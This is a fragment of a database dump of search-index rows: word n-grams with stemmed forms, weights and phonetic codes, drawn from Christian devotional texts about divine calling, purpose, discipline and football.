(303284, 'other thing', 'other thing', 0, 1, 1.3667, 'O36352', 1, '*'),
(303285, 'other thing on', 'other thing on', 0, 1, 1.4667, 'O363525', 1, '*'),
(303286, 'our comfort', 'our comfort', 0, 1, 1.3667, 'O625163', 1, '*'),
(303287, 'our comfort but', 'our comfort but', 0, 1, 1.5, 'O62516313', 1, '*'),
(303288, 'our lives till', 'our lives till', 0, 1, 1.4667, 'O641234', 1, '*'),
(303289, 'our works', 'our works', 0, 1, 1.3, 'O620', 1, '*'),
(303290, 'our works but', 'our works but', 0, 1, 1.4333, 'O6213', 1, '*'),
(303291, 'own purpose', 'own purpose', 0, 1, 1.3667, 'O51612', 1, '*'),
(303292, 'own purpose and', 'own purpose and', 0, 1, 1.5, 'O5161253', 1, '*'),
(303293, 'own purpose one', 'own purpose one', 0, 1, 1.5, 'O516125', 1, '*'),
(303294, 'pastor and', 'pastor and', 0, 1, 1.3333, 'P23653', 1, '*'),
(303295, 'pastor and preacher', 'pastor and preacher', 0, 1, 1.6333, 'P236531626', 1, '*'),
(303296, 'paul is', 'paul is', 0, 1, 1.2333, 'P420', 1, '*'),
(303297, 'paul is referring', 'paul is referring', 0, 1, 1.5667, 'P4261652', 1, '*'),
(303298, 'people that we', 'peopl that we', 0, 1, 1.4667, 'P430', 1, '*'),
(303299, 'people went', 'peopl went', 0, 1, 1.3667, 'P453', 1, '*'),
(303300, 'people went on', 'peopl went on', 0, 1, 1.4667, 'P4535', 1, '*'),
(303301, 'person\'s intention', 'person intention', 0, 1, 1.6, 'P625253535', 1, '*'),
(303302, 'person\'s intention one', 'person intention one', 0, 1, 1.7333, 'P625253535', 1, '*'),
(303303, 'play for', 'plai for', 0, 1, 1.2667, 'P416', 1, '*'),
(303304, 'play for clubs', 'plai for clubs', 0, 1, 1.4667, 'P4162412', 1, '*'),
(303305, 'play for the', 'plai for the', 0, 1, 1.4, 'P4163', 1, '*'),
(303306, 'played', 'plai', 0, 0, 0.4, 'P430', 1, '*'),
(303307, 'played football', 'plai football', 0, 1, 1.5, 'P431314', 1, '*'),
(303308, 'played football and', 'plai football and', 0, 1, 1.6333, 'P43131453', 1, '*'),
(303309, 'played football together', 'plai football together', 0, 1, 1.8, 'P4313143236', 1, '*'),
(303310, 'preacher', 'preacher', 0, 0, 0.5333, 'P626', 1, '*'),
(303311, 'preacher god', 'preacher god', 0, 1, 1.4, 'P62623', 1, '*'),
(303312, 'preacher god would', 'preacher god would', 0, 1, 1.6, 'P6262343', 1, '*'),
(303313, 'preacher of', 'preacher of', 0, 1, 1.3667, 'P6261', 1, '*'),
(303314, 'preacher of the', 'preacher of the', 0, 1, 1.5, 'P62613', 1, '*'),
(303315, 'purpose and grace', 'purpos and grace', 0, 1, 1.5667, 'P61253262', 1, '*'),
(303316, 'purpose and there', 'purpos and there', 0, 1, 1.5667, 'P612536', 1, '*'),
(303317, 'purpose god is', 'purpos god is', 0, 1, 1.4667, 'P61232', 1, '*'),
(303318, 'purpose in our', 'purpos in our', 0, 1, 1.4667, 'P61256', 1, '*'),
(303319, 'purpose one', 'purpos one', 0, 1, 1.3667, 'P6125', 1, '*'),
(303320, 'purpose one of', 'purpos one of', 0, 1, 1.4667, 'P61251', 1, '*'),
(303321, 'put inside', 'put inside', 0, 1, 1.3333, 'P3523', 1, '*'),
(303322, 'put inside you', 'put inside you', 0, 1, 1.4667, 'P3523', 1, '*'),
(303323, 'qualify', 'qualifi', 0, 0, 0.4667, 'Q410', 1, '*'),
(303324, 'qualify for', 'qualifi for', 0, 1, 1.3667, 'Q416', 1, '*'),
(303325, 'qualify for the', 'qualifi for the', 0, 1, 1.5, 'Q4163', 1, '*'),
(303326, 'quite', 'quit', 0, 0, 0.3333, 'Q300', 1, '*'),
(303327, 'quite good', 'quit good', 0, 1, 1.3333, 'Q323', 1, '*'),
(303328, 'quite good i', 'quit good i', 0, 1, 1.4, 'Q323', 1, '*'),
(303329, 'race i', 'race i', 0, 1, 1.2, 'R200', 1, '*'),
(303330, 'race i played', 'race i played', 0, 1, 1.4333, 'R2143', 1, '*'),
(303331, 'ran 1500', 'ran 1500', 0, 1, 1.2667, 'R500', 1, '*'),
(303332, 'ran 1500 metres', 'ran 1500 metres', 0, 1, 1.5, 'R5362', 1, '*'),
(303333, 'received the', 'receiv the', 0, 1, 1.4, 'R213', 1, '*'),
(303334, 'received the calling', 'receiv the calling', 0, 1, 1.6667, 'R2132452', 1, '*'),
(303335, 'referring to in', 'refer to in', 0, 1, 1.5, 'R165235', 1, '*'),
(303336, 'release it', 'releas it', 0, 1, 1.3333, 'R423', 1, '*'),
(303337, 'release it to', 'releas it to', 0, 1, 1.4333, 'R423', 1, '*'),
(303338, 'remember some', 'rememb some', 0, 1, 1.4333, 'R51625', 1, '*'),
(303339, 'remember some of', 'rememb some of', 0, 1, 1.5333, 'R516251', 1, '*'),
(303340, 'responsibilities assignments', 'respons assignments', 0, 1, 1.9333, 'R21521432532', 1, '*'),
(303341, 'responsibilities assignments that', 'respons assignments that', 0, 1, 2, 'R215214325323', 1, '*'),
(303342, 's heart 30', 's heart 30', 0, 1, 1.3333, 'S630', 1, '*'),
(303343, 'sacred thing', 'sacr thing', 0, 1, 1.4, 'S6352', 1, '*'),
(303344, 'sacred thing your', 'sacr thing your', 0, 1, 1.5667, 'S63526', 1, '*'),
(303345, 'saved there', 'save there', 0, 1, 1.3667, 'S136', 1, '*'),
(303346, 'saved there is', 'save there is', 0, 1, 1.4667, 'S1362', 1, '*'),
(303347, 'saved us', 'save us', 0, 1, 1.2667, 'S132', 1, '*'),
(303348, 'saved us and', 'save us and', 0, 1, 1.4, 'S13253', 1, '*'),
(303349, 'school i', 'school i', 0, 1, 1.2667, 'S400', 1, '*'),
(303350, 'school i was', 'school i was', 0, 1, 1.4, 'S420', 1, '*'),
(303351, 'scripture above are', 'scriptur above are', 0, 1, 1.6333, 'S613616', 1, '*'),
(303352, 'secondary school', 'secondari school', 0, 1, 1.5333, 'S53624', 1, '*'),
(303353, 'secondary school i', 'secondari school i', 0, 1, 1.6, 'S53624', 1, '*'),
(303354, 'sent you', 'sent you', 0, 1, 1.2667, 'S530', 1, '*'),
(303355, 'sent you to', 'sent you to', 0, 1, 1.3667, 'S530', 1, '*'),
(303356, 'so you can\'t', 'so you can', 0, 1, 1.4, 'S530', 1, '*'),
(303357, 'something and', 'someth and', 0, 1, 1.4333, 'S535253', 1, '*'),
(303358, 'something and use', 'someth and use', 0, 1, 1.5667, 'S5352532', 1, '*'),
(303359, 'something that god', 'someth that god', 0, 1, 1.6, 'S5352323', 1, '*'),
(303360, 'stand before jesus', 'stand before jesus', 0, 1, 1.6, 'S353162', 1, '*'),
(303361, 'star', 'star', 0, 0, 0.2667, 'S360', 1, '*'),
(303362, 'star and', 'star and', 0, 1, 1.2667, 'S3653', 1, '*'),
(303363, 'star and i', 'star and i', 0, 1, 1.3333, 'S3653', 1, '*'),
(303364, 'star it', 'star it', 0, 1, 1.2333, 'S363', 1, '*'),
(303365, 'star it is', 'star it is', 0, 1, 1.3333, 'S3632', 1, '*'),
(303366, 'still remember', 'still remember', 0, 1, 1.4667, 'S346516', 1, '*'),
(303367, 'still remember some', 'still remember some', 0, 1, 1.6333, 'S34651625', 1, '*'),
(303368, 'take god\'s', 'take god', 0, 1, 1.3333, 'T232', 1, '*'),
(303369, 'take god\'s intention', 'take god intention', 0, 1, 1.6667, 'T23253535', 1, '*'),
(303370, 'take the calling', 'take the calling', 0, 1, 1.5333, 'T232452', 1, '*'),
(303371, 'talent', 'talent', 0, 0, 0.4, 'T453', 1, '*'),
(303372, 'talent but', 'talent but', 0, 1, 1.3333, 'T45313', 1, '*'),
(303373, 'talent but if', 'talent but if', 0, 1, 1.4333, 'T453131', 1, '*'),
(303374, 'talent in', 'talent in', 0, 1, 1.3, 'T4535', 1, '*'),
(303375, 'talent in football', 'talent in football', 0, 1, 1.6, 'T45351314', 1, '*'),
(303376, 'talent too', 'talent too', 0, 1, 1.3333, 'T453', 1, '*'),
(303377, 'talent too i', 'talent too i', 0, 1, 1.4, 'T453', 1, '*'),
(303378, 'team', 'team', 0, 0, 0.2667, 'T500', 1, '*'),
(303379, 'team and', 'team and', 0, 1, 1.2667, 'T530', 1, '*'),
(303380, 'team and i', 'team and i', 0, 1, 1.3333, 'T530', 1, '*'),
(303381, 'that call', 'that call', 0, 1, 1.3, 'T240', 2, '*'),
(303382, 'that god cannot', 'that god cannot', 0, 1, 1.5, 'T23253', 1, '*'),
(303383, 'that it will', 'that it will', 0, 1, 1.4, 'T400', 1, '*'),
(303384, 'that paul is', 'that paul is', 0, 1, 1.4, 'T142', 1, '*'),
(303385, 'that sacred', 'that sacred', 0, 1, 1.3667, 'T263', 1, '*'),
(303386, 'that sacred thing', 'that sacred thing', 0, 1, 1.5667, 'T26352', 1, '*'),
(303387, 'that talent', 'that talent', 0, 1, 1.3667, 'T453', 1, '*'),
(303388, 'that talent but', 'that talent but', 0, 1, 1.5, 'T45313', 1, '*'),
(303389, 'that we played', 'that we played', 0, 1, 1.4667, 'T143', 1, '*'),
(303390, 'that went', 'that went', 0, 1, 1.3, 'T530', 1, '*'),
(303391, 'that went on', 'that went on', 0, 1, 1.4, 'T535', 1, '*'),
(303392, 'the call so', 'the call so', 0, 1, 1.3667, 'T242', 1, '*'),
(303393, 'the call that', 'the call that', 0, 1, 1.4333, 'T243', 1, '*'),
(303394, 'the calling has', 'the calling has', 0, 1, 1.5, 'T2452', 1, '*'),
(303395, 'the calling of', 'the calling of', 0, 1, 1.4667, 'T24521', 1, '*'),
(303396, 'the calling you', 'the calling you', 0, 1, 1.5, 'T2452', 1, '*'),
(303397, 'the earth a', 'the earth a', 0, 1, 1.3667, 'T630', 1, '*'),
(303398, 'the earth and', 'the earth and', 0, 1, 1.4333, 'T6353', 1, '*'),
(303399, 'the gospel and', 'the gospel and', 0, 1, 1.4667, 'T21453', 1, '*'),
(303400, 'the most dangerous', 'the most dangerous', 0, 1, 1.6, 'T5235262', 1, '*'),
(303401, 'the national', 'the national', 0, 1, 1.4, 'T5354', 1, '*'),
(303402, 'the national team', 'the national team', 0, 1, 1.5667, 'T535435', 1, '*'),
(303403, 'the people that', 'the people that', 0, 1, 1.5, 'T143', 2, '*'),
(303404, 'them when i', 'them when i', 0, 1, 1.3667, 'T500', 1, '*'),
(303405, 'thing on', 'thing on', 0, 1, 1.2667, 'T525', 1, '*'),
(303406, 'thing on the', 'thing on the', 0, 1, 1.4, 'T5253', 1, '*'),
(303407, 'thing your', 'thing your', 0, 1, 1.3333, 'T526', 1, '*'),
(303408, 'thing your destiny', 'thing your destiny', 0, 1, 1.6, 'T5263235', 1, '*'),
(303409, 'things are but', 'thing are but', 0, 1, 1.4667, 'T52613', 1, '*'),
(303410, 'things we can', 'thing we can', 0, 1, 1.4333, 'T525', 1, '*'),
(303411, 'those activities duties', 'those activities duties', 0, 1, 1.7667, 'T2313232', 1, '*'),
(303412, 'those things are', 'those things are', 0, 1, 1.5333, 'T23526', 1, '*'),
(303413, 'time began', 'time began', 0, 1, 1.3333, 'T5125', 1, '*'),
(303414, 'time began if', 'time began if', 0, 1, 1.4333, 'T51251', 1, '*'),
(303415, 'time in creating', 'time in creating', 0, 1, 1.5333, 'T526352', 1, '*'),
(303416, 'timothy 1', 'timothi 1', 0, 1, 1.3, 'T530', 1, '*'),
(303417, 'timothy 1 9', 'timothi 1 9', 0, 1, 1.3667, 'T530', 1, '*'),
(303418, 'to bring your', 'to bring your', 0, 1, 1.4333, 'T16526', 1, '*'),
(303419, 'to have gone', 'to have gone', 0, 1, 1.4, 'T125', 1, '*'),
(303420, 'to his own', 'to his own', 0, 1, 1.3333, 'T250', 1, '*'),
(303421, 'to his purpose', 'to his purpose', 0, 1, 1.4667, 'T21612', 1, '*'),
(303422, 'to in', 'to in', 0, 1, 1.1667, 'T500', 1, '*'),
(303423, 'to in the', 'to in the', 0, 1, 1.3, 'T530', 1, '*'),
(303424, 'to mankind', 'to mankind', 0, 1, 1.3333, 'T5253', 1, '*'),
(303425, 'to mankind there', 'to mankind there', 0, 1, 1.5333, 'T52536', 1, '*'),
(303426, 'to our comfort', 'to our comfort', 0, 1, 1.4667, 'T625163', 1, '*'),
(303427, 'to our works', 'to our works', 0, 1, 1.4, 'T620', 1, '*'),
(303428, 'to play for', 'to play for', 0, 1, 1.3667, 'T1416', 1, '*'),
(303429, 'to qualify', 'to qualify', 0, 1, 1.3333, 'T241', 1, '*'),
(303430, 'to qualify for', 'to qualify for', 0, 1, 1.4667, 'T2416', 1, '*'),
(303431, 'to take god\'s', 'to take god', 0, 1, 1.4333, 'T232', 1, '*'),
(303432, 'to the earth', 'to the earth', 0, 1, 1.4, 'T630', 1, '*'),
(303433, 'to wasting', 'to wasting', 0, 1, 1.3333, 'T2352', 1, '*'),
(303434, 'to wasting god\'s', 'to wasting god', 0, 1, 1.5333, 'T235232', 1, '*'),
(303435, 'to your divine', 'to your divine', 0, 1, 1.4667, 'T6315', 1, '*'),
(303436, 'together that', 'togeth that', 0, 1, 1.4333, 'T2363', 1, '*'),
(303437, 'together that went', 'togeth that went', 0, 1, 1.6, 'T236353', 1, '*'),
(303438, 'too i', 'too i', 0, 1, 1.1667, 'T000', 1, '*'),
(303439, 'too i could', 'too i could', 0, 1, 1.3667, 'T243', 1, '*'),
(303440, 'two people', 'two people', 0, 1, 1.3333, 'T140', 1, '*'),
(303441, 'two people went', 'two people went', 0, 1, 1.5, 'T1453', 1, '*'),
(303442, 'us and called', 'us and called', 0, 1, 1.4333, 'U253243', 1, '*'),
(303443, 'us in christ', 'us in christ', 0, 1, 1.4, 'U252623', 1, '*'),
(303444, 'us with a', 'us with a', 0, 1, 1.3, 'U230', 1, '*'),
(303445, 'use it for', 'us it for', 0, 1, 1.3333, 'U2316', 1, '*'),
(303446, 'was a good', 'wa a good', 0, 1, 1.3333, 'W230', 1, '*'),
(303447, 'was given to', 'wa given to', 0, 1, 1.4, 'W2153', 1, '*'),
(303448, 'was in secondary', 'wa in secondary', 0, 1, 1.5333, 'W252536', 1, '*'),
(303449, 'was quite', 'wa quite', 0, 1, 1.3, 'W230', 1, '*'),
(303450, 'was quite good', 'wa quite good', 0, 1, 1.4667, 'W2323', 1, '*'),
(303451, 'waste now', 'wast now', 0, 1, 1.3, 'W235', 1, '*'),
(303452, 'waste now i', 'wast now i', 0, 1, 1.3667, 'W235', 1, '*'),
(303453, 'waste the calling', 'wast the calling', 0, 1, 1.5667, 'W232452', 1, '*'),
(303454, 'wasting god\'s', 'wast god', 0, 1, 1.4333, 'W235232', 1, '*'),
(303455, 'wasting god\'s time', 'wast god time', 0, 1, 1.6, 'W23523235', 1, '*'),
(303456, 'we invested', 'we invested', 0, 1, 1.3667, 'W5123', 1, '*'),
(303457, 'we invested inside', 'we invested inside', 0, 1, 1.6, 'W5123523', 1, '*'),
(303458, 'we played', 'we played', 0, 1, 1.3, 'W143', 1, '*'),
(303459, 'we played football', 'we played football', 0, 1, 1.6, 'W1431314', 1, '*'),
(303460, 'we put', 'we put', 0, 1, 1.2, 'W130', 1, '*'),
(303461, 'we put inside', 'we put inside', 0, 1, 1.4333, 'W13523', 1, '*'),
(303462, 'week goand', 'week goand', 0, 1, 1.3333, 'W253', 1, '*'),
(303463, 'week goand win', 'week goand win', 0, 1, 1.4667, 'W2535', 1, '*'),
(303464, 'went on', 'went on', 0, 1, 1.2333, 'W535', 1, '*'),
(303465, 'went on to', 'went on to', 0, 1, 1.3333, 'W5353', 1, '*'),
(303466, 'what i', 'what i', 0, 1, 1.2, 'W300', 1, '*'),
(303467, 'what i sent', 'what i sent', 0, 1, 1.3667, 'W3253', 1, '*'),
(303468, 'what we invested', 'what we invested', 0, 1, 1.5333, 'W35123', 1, '*'),
(303469, 'what we put', 'what we put', 0, 1, 1.3667, 'W313', 1, '*'),
(303470, 'which was given', 'which was given', 0, 1, 1.5, 'W215', 1, '*'),
(303471, 'who has saved', 'who has saved', 0, 1, 1.4333, 'W213', 1, '*'),
(303472, 'will amount', 'will amount', 0, 1, 1.3667, 'W453', 1, '*'),
(303473, 'will amount to', 'will amount to', 0, 1, 1.4667, 'W453', 1, '*'),
(303474, 'will fulfill his', 'will fulfill his', 0, 1, 1.5333, 'W414142', 1, '*'),
(303475, 'will now', 'will now', 0, 1, 1.2667, 'W450', 1, '*'),
(303476, 'will now have', 'will now have', 0, 1, 1.4333, 'W451', 1, '*'),
(303477, 'with a holy', 'with a holy', 0, 1, 1.3667, 'W340', 1, '*'),
(303478, 'with your efforts', 'with your efforts', 0, 1, 1.5667, 'W361632', 1, '*'),
(303479, 'withdraw from', 'withdraw from', 0, 1, 1.4333, 'W36165', 1, '*'),
(303480, 'withdraw from your', 'withdraw from your', 0, 1, 1.6, 'W361656', 1, '*'),
(303481, 'works but', 'work but', 0, 1, 1.3, 'W6213', 1, '*'),
(303482, 'works but according', 'work but according', 0, 1, 1.6333, 'W621326352', 1, '*'),
(303483, 'would have considered', 'would have considered', 0, 1, 1.7, 'W431252363', 1, '*'),
(303484, 'you can\'t do', 'you can do', 0, 1, 1.4, 'Y253', 1, '*'),
(303485, 'you can\'t merit', 'you can merit', 0, 1, 1.5, 'Y253563', 1, '*'),
(303486, 'you do every', 'you do every', 0, 1, 1.4, 'Y316', 1, '*'),
(303487, 'you do what', 'you do what', 0, 1, 1.3667, 'Y300', 2, '*'),
(303488, 'you don\'t do', 'you don do', 0, 1, 1.4, 'Y353', 1, '*'),
(303489, 'you for you', 'you for you', 0, 1, 1.3667, 'Y160', 1, '*'),
(303490, 'you from heaven', 'you from heaven', 0, 1, 1.5, 'Y16515', 1, '*'),
(303491, 'you how', 'you how', 0, 1, 1.2333, 'Y000', 1, '*'),
(303492, 'you how many', 'you how many', 0, 1, 1.4, 'Y500', 1, '*'),
(303493, 'you must find', 'you must find', 0, 1, 1.4333, 'Y523153', 2, '*'),
(303494, 'you obtained', 'you obtained', 0, 1, 1.4, 'Y1353', 1, '*'),
(303495, 'you obtained as', 'you obtained as', 0, 1, 1.5, 'Y13532', 1, '*'),
(303496, 'you received', 'you received', 0, 1, 1.4, 'Y6213', 1, '*'),
(303497, 'you received the', 'you received the', 0, 1, 1.5333, 'Y6213', 1, '*'),
(303498, 'you release', 'you release', 0, 1, 1.3667, 'Y642', 1, '*'),
(303499, 'you release it', 'you release it', 0, 1, 1.4667, 'Y6423', 1, '*'),
(303500, 'you what we', 'you what we', 0, 1, 1.3667, 'Y300', 1, '*'),
(303501, 'you will now', 'you will now', 0, 1, 1.4, 'Y450', 1, '*'),
(303502, 'you “did', 'you “did', 0, 1, 1.2667, 'Y300', 1, '*'),
(303503, 'you “did you', 'you “did you', 0, 1, 1.4, 'Y300', 1, '*'),
(303504, 'your divine call', 'your divine call', 0, 1, 1.5333, 'Y631524', 1, '*'),
(303505, 'your effort', 'your effort', 0, 1, 1.3667, 'Y6163', 1, '*'),
(303506, 'your effort into', 'your effort into', 0, 1, 1.5333, 'Y616353', 1, '*'),
(303507, 'your efforts', 'your efforts', 0, 1, 1.4, 'Y61632', 1, '*'),
(303508, 'your efforts but', 'your efforts but', 0, 1, 1.5333, 'Y6163213', 1, '*'),
(303509, 'your life if', 'your life if', 0, 1, 1.4, 'Y641', 1, '*'),
(303510, 'your own purpose', 'your own purpose', 0, 1, 1.5333, 'Y651612', 1, '*'),
(303511, '“did', '“did', 0, 0, 0.2667, '“300', 1, '*'),
(303512, '“did you', '“did you', 0, 1, 1.2667, '“300', 1, '*'),
(303513, '“did you do', '“did you do', 0, 1, 1.3667, '“300', 1, '*'),
(303927, '46 from', '46 from', 0, 1, 1.2333, 'F650', 1, '*'),
(303928, '46 from our', '46 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(303929, 'item 46', 'item 46', 0, 1, 1.2333, 'I350', 1, '*'),
(303930, 'item 46 from', 'item 46 from', 0, 1, 1.4, 'I35165', 1, '*'),
(303931, 'k2 item 46', 'k2 item 46', 0, 1, 1.3333, 'K350', 1, '*'),
(303941, '28 05', '28 05', 0, 1, 1.1667, '', 1, '*'),
(303942, '28 05 2017', '28 05 2017', 0, 1, 1.3333, '', 1, '*'),
(303943, '49 from', '49 from', 0, 1, 1.2333, 'F650', 1, '*'),
(303944, '49 from our', '49 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(303945, 'a piece of', 'a piece of', 0, 1, 1.3333, 'A121', 1, '*'),
(303946, 'accepting discipline', 'accept discipline', 0, 1, 1.6667, 'A2135232145', 1, '*'),
(303947, 'accepting discipline maynot', 'accept discipline maynot', 0, 1, 1.9, 'A21352321453', 1, '*'),
(303948, 'bread discipline', 'bread discipline', 0, 1, 1.5333, 'B632145', 1, '*'),
(303949, 'bread discipline on', 'bread discipline on', 0, 1, 1.6333, 'B632145', 1, '*'),
(303950, 'discipline maynot', 'disciplin maynot', 0, 1, 1.5667, 'D21453', 1, '*'),
(303951, 'discipline maynot be', 'disciplin maynot be', 0, 1, 1.6667, 'D214531', 1, '*'),
(303952, 'father\'s heart 28', 'father heart 28', 0, 1, 1.5667, 'F36263', 1, '*'),
(303953, 'god embrace', 'god embrace', 0, 1, 1.3667, 'G35162', 1, '*'),
(303954, 'god embrace discipline', 'god embrace discipline', 0, 1, 1.7333, 'G3516232145', 1, '*'),
(303955, 'heart 28', 'heart 28', 0, 1, 1.2667, 'H630', 1, '*'),
(303956, 'heart 28 05', 'heart 28 05', 0, 1, 1.3667, 'H630', 1, '*'),
(303957, 'item 49', 'item 49', 0, 1, 1.2333, 'I350', 1, '*'),
(303958, 'item 49 from', 'item 49 from', 0, 1, 1.4, 'I35165', 1, '*'),
(303959, 'k2 item 49', 'k2 item 49', 0, 1, 1.3333, 'K350', 1, '*'),
(303960, 'maynot', 'maynot', 0, 0, 0.4, 'M300', 1, '*'),
(303961, 'maynot be', 'maynot be', 0, 1, 1.3, 'M310', 1, '*'),
(303962, 'maynot be the', 'maynot be the', 0, 1, 1.4333, 'M313', 1, '*'),
(303963, 'of bread', 'of bread', 0, 1, 1.2667, 'O163', 1, '*'),
(303964, 'of bread discipline', 'of bread discipline', 0, 1, 1.6333, 'O1632145', 1, '*'),
(303965, 'of god embrace', 'of god embrace', 0, 1, 1.4667, 'O1235162', 1, '*'),
(303966, 'piece of', 'piec of', 0, 1, 1.2667, 'P210', 1, '*'),
(303967, 'piece of bread', 'piec of bread', 0, 1, 1.4667, 'P2163', 1, '*'),
(303968, 'reproach accepting discipline', 'reproach accepting discipline', 0, 1, 1.9667, 'R162135232145', 1, '*'),
(303969, 's heart 28', 's heart 28', 0, 1, 1.3333, 'S630', 1, '*'),
(303972, 'supernatural from', 'supernatur from', 0, 1, 1.5667, 'S165364165', 1, '*'),
(303973, 'supernatural from our', 'supernatur from our', 0, 1, 1.7, 'S1653641656', 1, '*'),
(303974, 'the supernatural from', 'the supernatural from', 0, 1, 1.7, 'T2165364165', 1, '*'),
(303975, '1 want', '1 want', 0, 1, 1.2, 'W530', 1, '*'),
(303976, '1 want you', '1 want you', 0, 1, 1.3333, 'W530', 1, '*'),
(303977, '11 06', '11 06', 0, 1, 1.1667, '', 1, '*'),
(303978, '11 06 2017', '11 06 2017', 0, 1, 1.3333, '', 1, '*'),
(303979, '51', '51', 0, 0, 0.2, '', 1, '*'),
(303980, '51 god', '51 god', 0, 1, 1.2, 'G300', 1, '*'),
(303981, '51 god is', '51 god is', 0, 1, 1.3, 'G320', 1, '*'),
(303982, 'a man\'s life', 'a man life', 0, 1, 1.4, 'A5241', 1, '*'),
(303983, 'a prophet of', 'a prophet of', 0, 1, 1.4, 'A16131', 1, '*'),
(303984, 'a prophet unto', 'a prophet unto', 0, 1, 1.4667, 'A161353', 1, '*'),
(303985, 'a queen', 'a queen', 0, 1, 1.2333, 'A250', 1, '*'),
(303986, 'a queen in', 'a queen in', 0, 1, 1.3333, 'A250', 1, '*'),
(303987, 'a saviour', 'a saviour', 0, 1, 1.3, 'A216', 1, '*'),
(303988, 'a saviour and', 'a saviour and', 0, 1, 1.4333, 'A21653', 1, '*'),
(303989, 'a saviour of', 'a saviour of', 0, 1, 1.4, 'A2161', 1, '*'),
(303990, 'a secondary', 'a secondary', 0, 1, 1.3667, 'A2536', 1, '*'),
(303991, 'a secondary purpose', 'a secondary purpose', 0, 1, 1.6333, 'A25361612', 1, '*'),
(303992, 'a time as', 'a time as', 0, 1, 1.3, 'A352', 2, '*'),
(303993, 'actually fulfilling', 'actual fulfilling', 0, 1, 1.6333, 'A234141452', 1, '*'),
(303994, 'actually fulfilling the', 'actual fulfilling the', 0, 1, 1.7667, 'A2341414523', 1, '*'),
(303995, 'adjustments', 'adjust', 0, 0, 0.7333, 'A323532', 1, '*'),
(303996, 'adjustments till', 'adjust till', 0, 1, 1.5333, 'A32353234', 1, '*'),
(303997, 'adjustments till next', 'adjust till next', 0, 1, 1.7, 'A32353234523', 1, '*'),
(303998, 'affluence', 'affluenc', 0, 0, 0.6, 'A1452', 1, '*'),
(303999, 'affluence is', 'affluenc is', 0, 1, 1.4, 'A1452', 1, '*'),
(304000, 'affluence is the', 'affluenc is the', 0, 1, 1.5333, 'A14523', 1, '*'),
(304001, 'affluence once', 'affluenc once', 0, 1, 1.4667, 'A145252', 1, '*'),
(304002, 'affluence once the', 'affluenc once the', 0, 1, 1.6, 'A1452523', 1, '*'),
(304003, 'affluence the', 'affluenc the', 0, 1, 1.4333, 'A14523', 1, '*'),
(304004, 'affluence the influence', 'affluenc the influence', 0, 1, 1.7667, 'A1452351452', 1, '*'),
(304005, 'allocations of', 'alloc of', 0, 1, 1.4667, 'A423521', 1, '*'),
(304006, 'allocations of heaven', 'alloc of heaven', 0, 1, 1.7, 'A4235215', 1, '*'),
(304007, 'allowed', 'allow', 0, 0, 0.4667, 'A430', 1, '*'),
(304008, 'allowed into', 'allow into', 0, 1, 1.4, 'A4353', 1, '*'),
(304009, 'allowed into the', 'allow into the', 0, 1, 1.5333, 'A4353', 1, '*'),
(304010, 'almost missed', 'almost missed', 0, 1, 1.4333, 'A4523523', 1, '*'),
(304011, 'almost missed it', 'almost missed it', 0, 1, 1.5333, 'A4523523', 1, '*'),
(304012, 'also been', 'also been', 0, 1, 1.3, 'A4215', 1, '*'),
(304013, 'also been withdrawn', 'also been withdrawn', 0, 1, 1.6333, 'A4215365', 1, '*'),
(304014, 'although he', 'although he', 0, 1, 1.3667, 'A432', 1, '*'),
(304015, 'although he did', 'although he did', 0, 1, 1.5, 'A4323', 1, '*'),
(304016, 'always in that', 'alwai in that', 0, 1, 1.4667, 'A4253', 1, '*'),
(304017, 'always towards', 'alwai towards', 0, 1, 1.4667, 'A423632', 1, '*'),
(304018, 'always towards the', 'alwai towards the', 0, 1, 1.6, 'A4236323', 1, '*'),
(304019, 'and affluence', 'and affluence', 0, 1, 1.4333, 'A531452', 1, '*'),
(304020, 'and affluence the', 'and affluence the', 0, 1, 1.5667, 'A5314523', 1, '*'),
(304021, 'and allocations', 'and allocations', 0, 1, 1.5, 'A5342352', 1, '*'),
(304022, 'and allocations of', 'and allocations of', 0, 1, 1.6, 'A53423521', 1, '*'),
(304023, 'and before', 'and before', 0, 1, 1.3333, 'A5316', 1, '*'),
(304024, 'and before thou', 'and before thou', 0, 1, 1.5, 'A53163', 1, '*'),
(304025, 'and commitment', 'and commitment', 0, 1, 1.4667, 'A5325353', 1, '*'),
(304026, 'and commitment has', 'and commitment has', 0, 1, 1.6, 'A53253532', 1, '*'),
(304027, 'and divine', 'and divine', 0, 1, 1.3333, 'A5315', 2, '*'),
(304028, 'and divine funding', 'and divine funding', 0, 1, 1.6, 'A531515352', 1, '*'),
(304029, 'and finance', 'and finance', 0, 1, 1.3667, 'A53152', 1, '*'),
(304030, 'and finance a', 'and finance a', 0, 1, 1.4333, 'A53152', 1, '*'),
(304031, 'and funding', 'and funding', 0, 1, 1.3667, 'A5315352', 1, '*'),
(304032, 'and funding your', 'and funding your', 0, 1, 1.5333, 'A53153526', 1, '*'),
(304033, 'and god did', 'and god did', 0, 1, 1.3667, 'A5323', 1, '*'),
(304034, 'and he understood', 'and he understood', 0, 1, 1.5667, 'A5353623', 1, '*'),
(304035, 'and i ordained', 'and i ordained', 0, 1, 1.4667, 'A536353', 1, '*'),
(304036, 'and make necessary', 'and make necessary', 0, 1, 1.6, 'A5352526', 1, '*'),
(304037, 'and platform', 'and platform', 0, 1, 1.4, 'A53143165', 1, '*'),
(304038, 'and platform god', 'and platform god', 0, 1, 1.5333, 'A5314316523', 1, '*'),
(304039, 'and preserver', 'and preserver', 0, 1, 1.4333, 'A53162616', 1, '*'),
(304040, 'and preserver oflsrael', 'and preserver oflsrael', 0, 1, 1.7333, 'A5316261614264', 1, '*'),
(304041, 'and see where', 'and see where', 0, 1, 1.4333, 'A5326', 1, '*'),
(304042, 'and she got', 'and she got', 0, 1, 1.3667, 'A5323', 1, '*'),
(304043, 'and struggle', 'and struggle', 0, 1, 1.4, 'A5323624', 1, '*'),
(304044, 'and struggle on', 'and struggle on', 0, 1, 1.5, 'A53236245', 1, '*'),
(304045, 'answer that', 'answer that', 0, 1, 1.3667, 'A5263', 1, '*'),
(304046, 'answer that question', 'answer that question', 0, 1, 1.6667, 'A5263235', 1, '*'),
(304047, 'anything outside of', 'anyth outside of', 0, 1, 1.6333, 'A53523231', 1, '*'),
(304048, 'are always', 'ar always', 0, 1, 1.3333, 'A642', 1, '*'),
(304049, 'are always in', 'ar always in', 0, 1, 1.4333, 'A6425', 1, '*'),
(304050, 'are compromising', 'ar compromising', 0, 1, 1.5333, 'A625165252', 1, '*'),
(304051, 'are compromising or', 'ar compromising or', 0, 1, 1.6333, 'A6251652526', 1, '*'),
